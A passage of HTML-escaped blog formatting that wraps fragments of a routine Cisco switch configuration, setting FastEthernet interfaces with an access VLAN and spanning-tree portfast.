trunk&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;br /&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="font-weight: bold; "&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;!&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="font-weight: bold; "&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="font-weight: bold; "&gt;interface FastEthernet0/2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="font-weight: bold; "&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="font-weight: bold; "&gt; switchport access vlan 2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="font-weight: bold; "&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="font-weight: bold; "&gt; spanning-tree portfast&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="font-weight: bold; "&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="font-weight: bold; "&gt;!&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="font-weight: bold; "&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="font-weight: bold; "&gt;interface FastEthernet0/3&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="font-weight: bold; "&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="font-weight: bold; "&gt; spanning-tree portfast&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="font-weight: bold; "&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="font-weight: bold; "&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;!&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="font-weight: bold; "&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="font-weight: bold; "&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;interface FastEthernet0/4&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="font-weight: bold; "&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="font-weight: bold; "&gt;&lt;span class="Apple-style-span" style="font-weight: normal; 